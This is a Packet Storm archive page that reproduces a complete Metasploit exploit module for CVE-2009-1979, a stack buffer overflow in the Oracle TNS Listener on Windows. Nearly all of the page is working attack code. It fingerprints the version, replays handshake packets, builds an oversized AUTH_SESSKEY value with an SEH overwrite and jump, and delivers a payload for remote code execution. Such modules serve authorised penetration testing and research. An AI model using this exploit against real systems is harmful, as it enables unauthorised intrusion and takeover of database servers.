what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle TNS Listener AUTH_SESSKEY Buffer Overflow.

Oracle TNS Listener AUTH_SESSKEY Buffer Overflow.
Posted Jan 22, 2010
Authored by jduck | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in Oracle. When sending a specially crafted packet containing a long AUTH_SESSKEY value to the TNS service, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
advisories | CVE-2009-1979
SHA-256 | e9967e777e3c8fe58c92669e0506711f78d2e29ac497889ccf38191214de029e
Download | Favorite | View

Oracle TNS Listener AUTH_SESSKEY Buffer Overflow.

Change Mirror Download
##
# $Id: tns_auth_sesskey.rb 8183 2010-01-21 00:30:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::TNS
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle TNS Listener AUTH_SESSKEY Buffer Overflow.',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Oracle. When
        sending a specially crafted packet containing a long AUTH_SESSKEY value
        to the TNS service, an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8183 $',
      'References'     =>
        [
          [ 'CVE', '2009-1979'],
          [ 'OSVDB', '59110'],
          [ 'BID', '36747'],
          [ 'URL', 'http://blogs.conus.info/node/28' ],
          [ 'URL', 'http://blogs.conus.info/node/35' ],
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 0x17e,
          'BadChars' => "", # none, thx memcpy!
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],

          [ 'Oracle 10.2.0.1.0 Enterprise Edition',
            {
              # Untested
              'Ret' => 0x011b0528 # p/p/r in oracle.exe v10.2.0.3
            }
          ],
          [ 'Oracle 10.2.0.4.0 Enterprise Edition',
            {
              # Tested OK - 2010-Jan-20 - jduck
              'Ret' => 0x01347468 # p/p/r in oracle.exe v10.2.0.3
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Oct 20 2009'))

      register_options([Opt::RPORT(1521)], self.class)

  end


  def check
    version = tns_version
    if (not version)
      raise RuntimeError, "Unable to detect version!"
    end
    print_status("Oracle version reply: " + version)
    return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
    return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
    return Exploit::CheckCode::Safe
  end


  def exploit

    mytarget = nil
    if target.name =~ /Automatic/
         print_status("Attempting automatic target detection...")

      version = tns_version
      if (not version)
        raise RuntimeError, "Unable to detect version!"
      end

      if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
        mytarget = targets[1]
      elsif (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
        mytarget = targets[2]
      end

      if (not mytarget)
            raise RuntimeError, "Unable to automatically detect the target"
      end

      print_status("Automatically detected target \"#{mytarget.name}\"")
    else
      mytarget = target

      print_status("Attacking using target \"#{mytarget.name}\"")
    end


    username = rand_text_alphanumeric(0x1c)

    connect

    print_status("Sending NSPTCN packet ...")
    connect_data = "" +
      "(DESCRIPTION=" +
        "(CONNECT_DATA=" +
          "(SERVICE_NAME=orcl)" +
          "(CID=" +
            "(PROGRAM=client.exe)" +
            "(HOST=client_host)" +
          ")" +
        ")" +
        "(ADDRESS=" +
          "(PROTOCOL=TCP)" +
          "(PORT=1521)" +
        ")" +
      ")"
    nsptcn_pkt = tns_packet(connect_data)
    sock.put(nsptcn_pkt)

    # read NSPTRS (expecting 8 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    print_status("Re-sending NSPTCN packet ...")
    sock.put(nsptcn_pkt)

    # read NSPTAC (expecting 32 bytes)
    begin
      res = sock.get_once(-1, 1)
    rescue ::Errno::ECONNRESET, EOFError
      raise RuntimeError, "OOPS, maybe the service hasn't started completely yet, try again..."
    end
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send NA
    print_status("Sending NA packet ...")
    na_stuff = [0xdeadbeef].pack('N') +
      "\x00\x92" +
      "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" +
      "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" +
      "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" +
      "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00" +
      "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00" +
      "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00" +
      "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A" +
      "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00" +
      "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
    na_pkt = nsptda_packet(na_stuff)
    sock.put(na_pkt)

    # read response (expecting 127 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send TTIPRO
    print_status("Sending TTIPRO packet ...")
    ttipro_stuff = "\x01\x06\x05\x04\x03\x02\x01\x00" +
      "IBMPC/WIN_NT-8.1.0" +
      "\x00"
    ttipro_pkt = nsptda_packet(ttipro_stuff)
    sock.put(ttipro_pkt)

    # read response (expecting 179 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send TTIDTY
    print_status("Sending TTIDTY packet ...")
    ttidty_stuff = "\x02\xB2\x00\xB2\x00\xD2" +
      "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01" +
      "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01" +
      "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00" +
      "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
    ttidty_pkt = nsptda_packet(ttidty_stuff)
    sock.put(ttidty_pkt)

    # read response (expecting 22 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # send first auth pkt (call OSESSKEY)
    print_status("Calling OSESSKEY ...")
    params = []
    dtyauth_pkt = dtyauth_packet(0x76, username, 1, params)
    sock.put(dtyauth_pkt)

    # read RPA (expecting 225 bytes)
    res = sock.get_once(-1, 1)
    #print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))

    # build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e)
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # ensure bad ptr is derefed
    value = rand(0x3fffffff) | 0xc0000000
    sploit[0x17e,4] = [value].pack('V')

    # send overflow trigger packet (call kpoauth)
    params = []
    params << {
      'Name'   => 'AUTH_SESSKEY',
      'Value'  => sploit,
      'Flag'   => 1
    }
    dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
    sock.put(dtyauth_pkt)

    # expecting disconnect...
    if (res = sock.get_once(-1, 1))
      print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
      raise RuntimeError, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/"
    end

    handler
    disconnect
  end


  def tns_version
    connect
    version = "(CONNECT_DATA=(COMMAND=VERSION))"
    pkt = tns_packet(version)
    sock.put(pkt)
    sock.get_once
    res = sock.get_once(-1, 1)
    disconnect
    return res
  end


  def nsptda_packet(data)
    pkt = [data.length + 10].pack('n')    # NSPHDLEN
    pkt << [0].pack('n')                  # NSPHDPSM
    pkt << [6].pack('C')                  # pkt type
    pkt << [0].pack('C')                  # reserved
    pkt << [0].pack('n')                  # NSPHDHSM
    pkt << [0].pack('n')                  # NSPDAFLG
    pkt << data
    return pkt
  end


  def dtyauth_packet(opi, user, flag, params)
    dunno = 2
    dunno = 3 if opi == 0x73

    pkt = [3, opi, dunno].pack('CCC')

    pkt << [-2].pack('V')
    pkt << [user.length].pack('V')
    pkt << [flag].pack('V')

    pkt << [-2].pack('V')
    pkt << [params.length].pack('V')
    pkt << [-2].pack('V')
    pkt << [-2].pack('V')

    pkt << [user.length].pack('C')
    pkt << user

    params.each { |param|
      name = param['Name']
      pkt << [name.length].pack('V')
      pkt << [name.length].pack('C')
      pkt << name

      val = param['Value']
      pkt << [val.length].pack('V')
      if (val.length > 0)
        if (val.length > 0xff)
          pkt << chunkify(val)
        else
          pkt << [val.length].pack('C')
          pkt << val
        end
      end

      flag = param['Flag']
      pkt << [flag].pack('V')
    }
    return nsptda_packet(pkt)
  end


  def chunkify(buf)
    ret = ""
    if buf.length > 0xff
      ret << "\xfe"

      while (buf.length > 0xff)
        ret << "\xff"
        ret << buf.slice!(0, 0xff)
      end
      if buf.length > 0
        ret << [buf.length].pack('C')
        ret << buf
      end

      ret << "\x00"
    else
      ret << [buf.length].pack('C')
      ret << buf
    end
    return ret
  end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close